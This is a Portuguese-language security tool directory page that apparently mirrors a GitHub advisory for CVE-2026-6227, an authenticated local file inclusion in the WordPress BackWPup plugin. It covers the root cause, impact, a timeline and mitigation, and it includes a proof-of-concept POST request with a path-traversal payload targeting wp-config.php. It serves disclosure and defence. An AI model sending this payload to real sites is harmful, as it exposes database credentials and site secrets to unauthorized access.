Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-6227 — Prova de conceito educacional para CVE-2026-6227, uma Inclusão de Arquivo Local autenticada no plugin WordPress BackWPup, incluindo análise da causa raiz, requisição de exploração e orientações de mitigação. | Kitploit
Ferramentas/GitHubGitHub/pixel-defaultbr/cve-2026-6227
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebPapers e PesquisaAprendizado e Educação
GitHubpixel-defaultbr/cve-2026-6227

CVE-2026-6227

Prova de conceito educacional para CVE-2026-6227, uma Inclusão de Arquivo Local autenticada no plugin WordPress BackWPup, incluindo análise da causa raiz, requisição de exploração e orientações de mitigação.

Ver Repositório
8há 5 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-6227: Inclusão de Arquivo Local no BackWPup

CVSS Version Researcher

Resumo do Aviso

As versões do BackWPup até e incluindo a 5.6.6 são afetadas por uma vulnerabilidade de Inclusão de Arquivo Local (LFI) autenticada por meio do parâmetro block_name do endpoint REST /wp-json/backwpup/v1/getblock.

A falha foi causada pela sanitização não recursiva de sequências de travessia com str_replace() e já foi corrigida na versão 5.6.7.

Metadados

  • CVE: CVE-2026-6227
  • Gravidade: Alta
  • Pontuação CVSS: 7.2
  • Produto Afetado: Plugin WordPress BackWPup
  • Versões Afetadas: <= 5.6.6
  • Versão Corrigida: 5.6.7
  • Status: Corrigido
  • Data de Divulgação: 2026-04-13
  • Pesquisador: Pixel_DefaultBR

Aviso Legal

Este repositório é estritamente para fins educacionais e de pesquisa ética em segurança. As informações fornecidas aqui têm como objetivo ajudar administradores e equipes de segurança a verificar seus sistemas. Não use isto contra alvos sem permissão explícita e por escrito.

Superfície Afetada

  • Função: BackWPupHelpers::component()
  • Endpoint: POST /wp-json/backwpup/v1/getblock
  • Parâmetro: block_name
  • Nível de Acesso: Administrador Autenticado (ou usuários com permissões de backup delegadas)

Análise da Causa Raiz

O carregador de componentes vulnerável aplica uma sanitização não recursiva com str_replace() antes de invocar include(). Isso pode ser contornado usando padrões de travessia elaborados, como ....// ou ..././, permitindo a resolução de caminhos controlada pelo atacante.

Impacto

  • Inclusão arbitrária de arquivos PHP locais do sistema de arquivos do servidor
  • Potencial exposição de dados sensíveis (por exemplo, wp-config.php)
  • Possível execução remota de código em configurações específicas de servidor/aplicação

Por padrão, a exploração requer acesso de nível administrador. Se as permissões de backup forem delegadas, usuários com privilégios menores também podem se tornar capazes de explorar este problema.

Pré-condições de Exploração

  • Sessão WordPress autenticada válida
  • Nonce REST válido
  • Privilégios de administrador ou permissões de backup delegadas

Prova de Conceito

Cenário: Inclusão de Arquivo Local

  1. Faça login no WordPress usando uma conta com a capacidade de trabalho do BackWPup.
  2. Dispare uma solicitação normal pela interface do plugin e intercepte o tráfego com um proxy.
  3. Localize uma solicitação POST legítima para /wp-json/backwpup/v1/getblock.
  4. Substitua block_name por um payload de travessia.

Exemplo de solicitação:

POST /wp-json/backwpup/v1/getblock HTTP/1.1
Host: target.example.com
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-WP-Nonce: <your_nonce_here>
Cookie: wordpress_logged_in_<hash>=<your_session_cookie>

block_name=....//....//....//....//wp-config&block_type=component&block_data%5Btype%5D=success&block_data%5Bfont%5D=small&block_data%5Bdismiss_icon%5D=true&block_data%5Bcontent%5D=You+scheduled+a+new+backup+successfully!
  1. Observe a resposta para verificar o comportamento de inclusão de arquivo.

Linha do Tempo

  • 2026-03: Vulnerabilidade relatada ao fornecedor
  • 2026-03-25: Correção do fornecedor lançada na versão 5.6.7
  • 2026-04-13: Divulgação pública (CVE-2026-6227)

Mitigação

  • Atualize o BackWPup para a versão 5.6.7 ou posterior
  • Restrinja a atribuição da capacidade backwpup apenas a funções confiáveis
  • Revise os logs de auditoria em busca de acesso suspeito a /wp-json/backwpup/v1/getblock

Referências

  • Página do plugin do fornecedor: https://wordpress.org/plugins/backwpup/
  • Referência CVE (Wordfence): https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/backwpup/backwpup-566-authenticated-administrator-local-file-inclusion-via-block-name-parameter
Baixar ferramenta